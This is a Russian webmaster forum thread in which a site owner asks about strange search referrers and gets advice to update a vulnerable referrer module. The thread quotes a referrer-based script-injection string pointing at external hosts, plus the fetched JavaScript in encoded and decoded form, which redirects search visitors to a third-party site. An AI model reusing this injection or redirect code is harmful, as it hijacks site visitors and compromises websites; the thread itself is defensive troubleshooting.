- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Всем доброго! Есть проблема, помогите разобраться! Уже третий день на сайте отображаются в модуле реферер непонятные переходы с поисковика Гугл. Вот такого вида:
http://google.com/search?hl=ru&q=new-m%253Cscript%2520src=http://kyrovo.ru/b.js%253E%253C%252Fscript%253E или http://google.com/search?hl=ru&q=nok58%253Cscript%2520src=http://quzone.ru/l.js%253E%253C%252Fscript%253E причем все с разных IP адресов. Переходим по ссылке http://kyrovo.ru/b.js и получаем следующий код:
function l(h) {return parseInt(h,16);}var r=document.referrer;if (r.indexOf('google.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('yandex.') > -1 || r.indexOf('bing.com.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('rambler.') > -1 || r.indexOf('go.mail.') > -1){document.write(unescape("%3Cscript%20type%3D%22text/javascript%22%3Esp_redirect%20%3D%20%7B%7D%3Bsp_redirect.searchers%20%3D%20%5B%20%5B/google%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.yahoo%5C./i%2C%20/%28%5C%3F%7C%26%29p%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/bing%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.aol%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/ask%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/altavista%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.lycos%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/alltheweb%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/yandex%5C./i%2C%20/%28%5C%3F%7C%26%29text%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/%28nova%5C.%7Csearch%5C.%29%3Frambler%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/gogo%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/go%5C.mail%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/nigma%5C./i%2C%20/%28%5C%3F%7C%26%29s%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%5D%3Bsp_redirect.sp_redirect%20%3D%20function%28referer%29%20%7B%20var%20query%3Dnull%3B%20for%28var%20i%3D0%3B%20i%3Csp_redirect.searchers.length%3B%20i++%29%20%7B%20%20var%20se%20%3D%20sp_redirect.searchers%5Bi%5D%3B%20%20if%20%28referer.match%28se%5B0%5D%29%29%20%7B%20%20%20query%20%3D%20referer.match%28se%5B1%5D%29%5Bse%5B2%5D%5D%3B%20%20%20break%3B%20%20%7D%20%7D%20document.location.href%3D%27http%3A//shara.many-search-archiv.ru/%27+%27%3Fwkey%3D"+l('825c8')+"%27+%27%27+%28query%3F%20%27%26query%3D%27+query%20%3A%20%27%27%29%3B%7D%3Bsp_redirect.sp_redirect%28document.referrer%29%3B%3C/script%3E"));
}
При этом Яша пишет что вредоносный код на сайте! Что это такое и можно ли от этого избавиться?
пытаются взломать вас
уберите модуль этот, возможно он дырявый
Пытаются? На сайте вроде ничего интересного пока нет. А причем Яша и вредоносный код? Перелопатил весь скрипт, вроде чисто. Никаких iframe, eval unescape, base64 не нашел. Изменений в файлах по дате тоже нет! На что-же реагирует яндекс? Кстати данный скрипт в расшифрованном виде, если кому интересно:
function l(h) {return parseInt(h,16);}var r=document.referrer;if (r.indexOf('google.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('yandex.') > -1 || r.indexOf('bing.com.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('rambler.') > -1 || r.indexOf('go.mail.') > -1){document.write(unescape("<script type="text/javascript">sp_redirect = {};sp_redirect.searchers = [ [/google./i, /(?|&)q=(.*?)(&|$)/i, 2], [/search.yahoo./i, /(?|&)p=(.*?)(&|$)/i, 2], [/bing.com/i, /(?|&)q=(.*?)(&|$)/i, 2], [/search.aol./i, /(?|&)q=(.*?)(&|$)/i, 2], [/ask.com/i, /(?|&)q=(.*?)(&|$)/i, 2], [/altavista./i, /(?|&)q=(.*?)(&|$)/i, 2], [/search.lycos./i, /(?|&)query=(.*?)(&|$)/i, 2], [/alltheweb./i, /(?|&)q=(.*?)(&|$)/i, 2], [/yandex./i, /(?|&)text=(.*?)(&|$)/i, 2], [/(nova.|search.)?rambler./i, /(?|&)query=(.*?)(&|$)/i, 2], [/gogo./i, /(?|&)q=(.*?)(&|$)/i, 2], [/go.mail./i, /(?|&)q=(.*?)(&|$)/i, 2], [/nigma./i, /(?|&)s=(.*?)(&|$)/i, 2]];sp_redirect.sp_redirect = function(referer) { var query=null; for(var i=0; i<sp_redirect.searchers.length; i++) { var se = sp_redirect.searchers; if (referer.match(se[0])) { query = referer.match(se[1])[se[2]]; break; } } document.location.href='http://shara.many-search-archiv.ru/'+'?wkey="+l('825c8')+"'+''+(query? '&query='+query : '');};sp_redirect.sp_redirect(document.referrer);</script>"));
}
Miranda1974 добавил 18.06.2011 в 02:21
Не хотелось бы модуль убирать, какие еще версии защиты подскажете?
просто крадут Ваш трафик либо куки, либо и то и другое
Для исправления откройте файл engine/modules/referer.php и найдите (156 строка):
Заменить на:
с офсайта
Спасибо за помощь, но такой строчки у меня нет в модуле. Скорее всего не совпадают версии.
На сайте стоит версия 5.0. Обновить до последней, или что-то можно сделать с 5.0 ?
обновите до любой начиная с 7.0.1
последняя версия модуля 8.9
Снесите свое ГМО и инстальте новую версию.